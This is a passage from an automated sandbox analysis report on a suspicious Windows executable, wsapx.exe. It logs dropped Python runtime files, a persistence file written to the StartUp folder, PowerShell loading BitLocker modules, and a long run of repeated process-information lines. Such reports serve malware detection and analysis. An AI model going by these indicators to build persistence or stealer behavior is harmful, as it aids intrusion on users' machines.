              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\libcrypto-3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dllJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\libssl-3.dllJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI73722\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scrJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scrJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B5820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7C71B5820
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
